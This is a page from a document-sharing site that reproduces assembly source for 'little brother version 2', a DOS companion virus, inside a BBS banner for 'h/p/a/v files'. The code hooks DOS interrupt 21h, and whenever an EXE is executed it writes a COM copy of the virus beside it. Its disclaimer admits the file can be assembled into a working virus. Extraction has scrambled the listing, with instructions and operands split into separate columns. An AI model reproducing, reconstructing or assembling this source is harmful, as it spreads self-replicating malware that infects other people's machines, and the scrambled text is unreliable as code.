Brother 5

  • November 2019
  • PDF

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  • Words: 920
  • Pages: 6
;****************************************************************************; ; ; ; -=][][][][][][][][][][][][][][][=; ; -=] p e r f e c t c r i m e [=; ; -=] +31.(o)79.426o79 [=; ; -=] [=; ; -=] for all your h/p/a/v files [=; ; -=] sysop: peter venkman [=; ; -=] [=; ; -=] +31.(o)79.426o79 [=; ; -=] p e r f e c t c r i m e [=; ; -=][][][][][][][][][][][][][][][=; ; ; ; *** not for general distribution *** ; ; ; ; this file is for the purpose of virus study only! it should not be passed ; ; around among the general public. it will be very useful for learning how ; ; viruses work and propagate. but anybody with access to an assembler can ; ; turn it into a working virus and anybody with a bit of assembly coding ; ; experience can turn it into a far more malevolent program than it already ; ; is. keep this code in responsible hands! ; ; ; ;****************************************************************************; ;**************************************************************************** ;* little brother version 2 ;* ;* compile with masm 4.0 ;* (other assemblers will probably not produce the same result) ;* ;* disclaimer: ;* this file is only for educational purposes. the author takes no ;* responsibility for anything anyone does with this file. do not ;* modify this file! ;**************************************************************************** cseg

filelen respar version_ oi21 nameptr dta

segment assume cs:cseg,ds:cseg,es:nothing .radix


equ equ equ equ equ equ

end_ - begin (filelen/16d) + 17d 2 end_ end_+4 end_+8

;**************************************************************************** ;* install the program! ;**************************************************************************** org begin:


cld mov mov

ax,0044h es,ax

;move program to empty hole



mov mov mov movsb

di,0100h si,di cx,filelen

mov mov mov mov lodsw cmp je stosw movsw

ds,cx si,0084h di,offset oi21 dx,offset ni21

;get original int21 vector

ax,dx cancel

;already installed?

push pop mov int

es ds ax,2521h 21h

;set vector to new handler


;**************************************************************************** ;* file-extensions ;**************************************************************************** exe_txt com_txt

db db

'exe',0 'com',0

;**************************************************************************** ;* interupt handler 24 ;**************************************************************************** ni24:

mov iret


;**************************************************************************** ;* interupt handler 21 ;**************************************************************************** ni21:

pushf push push push push push

dx bx ax ds es

cmp jne

ax,4b00h exit





pop pop pop

es ds ax

;execute ?

pop pop popf

bx dx


dword ptr cs:[oi21]

;call to old int-handler

;**************************************************************************** ;* tries to infect the file (ptr to asciiz-name is ds:dx) ;**************************************************************************** infect:



rep do_exe:

mov mov

word ptr cs:[nameptr],dx ;save the ptr to the filename word ptr cs:[nameptr+2],ds

mov int push push

ah,2fh 21 es bx

;get old dta

push pop mov mov int

cs ds dx,offset dta ah,1ah 21

;set new dta

call push mov mov cmpsb pop jz

searchpoint di si,offset com_txt cx,3

mov mov cmpsb jnz

si,offset exe_txt cl,3

mov call

si,offset com_txt change_ext

;change extension to com

mov int push

ax,3300h 21 dx

;get ctrl-break flag

cwd inc push int

ax ax 21

mov int push push

ax,3524h 21 bx es

;get int24 vector



;set int24 vec to new handler

;is extension 'com'?

di do_com ;is extension 'exe'?


;clear the flag



pop mov mov push int

ds dx,offset ni24 ah,25h ax 21

lds xor mov int jc xchg

dx,dword ptr [nameptr] cx,cx ah,5bh 21 return1 bx,ax

push pop mov mov mov int cmp pushf

cs ds cx,filelen dx,offset begin ah,40h 21 ax,cx

mov int

ah,3eh 21

;close the file

popf jz


;all bytes written?

lds mov int

dx,dword ptr [nameptr] ah,41h 21

;no, delete the virus

pop pop pop int

ax ds dx 21

;restore int24 vector

pop pop int

ax dx 21

;restore ctrl-break flag

mov call

si,offset exe_txt change_ext

;change extension to exe ;execute exe-file

mov pop pop int

ah,1ah dx ds 21

;restore old dta

;create the virus (unique name)

;save handle

;write the virus

ret do_com:

call cmp jne mov call call jnc

findfirst ;is the com-file a virus? word ptr cs:[dta+1ah],filelen return ;no, execute com-file si,offset exe_txt ;does the exe-variant exist? change_ext findfirst return ;yes, execute exe-file

mov call jmp

si,offset com_txt change_ext short return

;change extension to com ;execute com-file

;**************************************************************************** ;* find the file ;**************************************************************************** findfirst:

lds mov mov int ret

dx,dword ptr [nameptr] cl,27h ah,4eh 21

;**************************************************************************** ;* change the extension of the filename (cs:si -> ext) ;**************************************************************************** change_ext:

call push pop movsw movsw ret

searchpoint cs ds

;**************************************************************************** ;* search begin of extension ;**************************************************************************** searchpoint: repnz

les mov mov scasb sub ret

di,dword ptr cs:[nameptr] ch,0ffh al,0 di,4

;**************************************************************************** ;* text and signature ;**************************************************************************** db

'little brother',0

ends end


end_: cseg

;****************************************************************************; ; ; ; -=][][][][][][][][][][][][][][][=; ; -=] p e r f e c t c r i m e [=; ; -=] +31.(o)79.426o79 [=; ; -=] [=; ; -=] for all your h/p/a/v files [=;

; -=] sysop: peter venkman [=; ; -=] [=; ; -=] +31.(o)79.426o79 [=; ; -=] p e r f e c t c r i m e [=; ; -=][][][][][][][][][][][][][][][=; ; ; ; *** not for general distribution *** ; ; ; ; this file is for the purpose of virus study only! it should not be passed ; ; around among the general public. it will be very useful for learning how ; ; viruses work and propagate. but anybody with access to an assembler can ; ; turn it into a working virus and anybody with a bit of assembly coding ; ; experience can turn it into a far more malevolent program than it already ; ; is. keep this code in responsible hands! ; ; ; ;****************************************************************************;

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